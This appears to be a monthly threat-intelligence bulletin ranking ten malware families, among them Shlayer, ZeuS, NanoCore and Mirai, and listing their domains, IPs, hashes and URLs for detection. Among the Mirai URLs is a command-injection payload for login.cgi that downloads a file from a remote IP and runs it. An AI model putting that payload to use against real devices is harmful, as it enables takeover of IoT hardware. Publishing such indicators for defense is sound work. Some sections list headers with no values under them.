In January 2021, malvertisement accounted for the greatest number of alerts. Malvertisement maintains the top initial infection vector due to Shlayer activity. Shlayer returned to the Top 10 Malware after new evidence resulted in it being reclassified as a trojan downloader compared to an adware dropper. Activity levels for malspam and malvertisement increased, while activity for dropped and multiple decreased. It is highly likely that malvertisement will remain the primary infection vector as the Shlayer campaign pans out.
Below are the Top 10 Malware ranked in order of prevalence. The respective indicators of compromise (IOCs) are provided to aid in detecting and preventing infections from these Top 10 Malware variants.
Shlayer is a downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malvertizing posing as a fake Adobe Flash updater. All Shlayer domains follow the same pattern <api.random_name.com>. Below area several examples of domains Shlayer uses.
Domains:
api.interfacecache[.]com
api.scalableunit[.]com
api.typicalconfig[.]com
api.standartanalog[.]com
api.fieldenumerator[.]com
api.practicalsprint[.]com
api.searchwebsvc[.]com
api.connectedtask[.]com
api.navigationbuffer[.]com
api.windowtask[.]com
ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants have adopted parts of it’s codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.
Domains
Opaopa[.]info
Edmontonjournal[.]com
IPs
8.208.90[.]18
163.172.61{.}158
185.244.217[.]126
URL
Dridex is a banking trojan which uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns.
Domains
Nanocore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.
MD5
bf994dce3712fb66afa4a2ce5b3ceee4
e01c79d227c6315150f7ff0afe40db4c
154a2366cd3e39e8625f5f737f9da8f1
CoinMiner is a cryptocurrency miner that uses Windows Management Instrumentation (WMI) and EternalBlue to spread across a network. CoinMiner uses the WMI Standard Event Consumer scripting to execute scripts for persistence. CoinMiner spreads through malspam or is dropped by other malware.
SHA256 Hashes
Danabot is a banking trojan spread via malspam using malicious macros in Microsoft Office. It has the ability to steal credentials, collect information on the infected system, use web injection, and drop other malware, such as GootKit.
Miraj is a malware botnet known to compromise internet of things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.
Domains
URL
/customers/4658fb8d67/images/v1/78cf84fdb7cfabbd8200.jpg
/customers/5a8e32ecee/images/v1/ecf1e61048.jpg
/customers/c4f77ab60c/images/v1/aa75cd2f99441664141a.jpg
/login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
/lookup?bundleId=com.easybrain.puzzles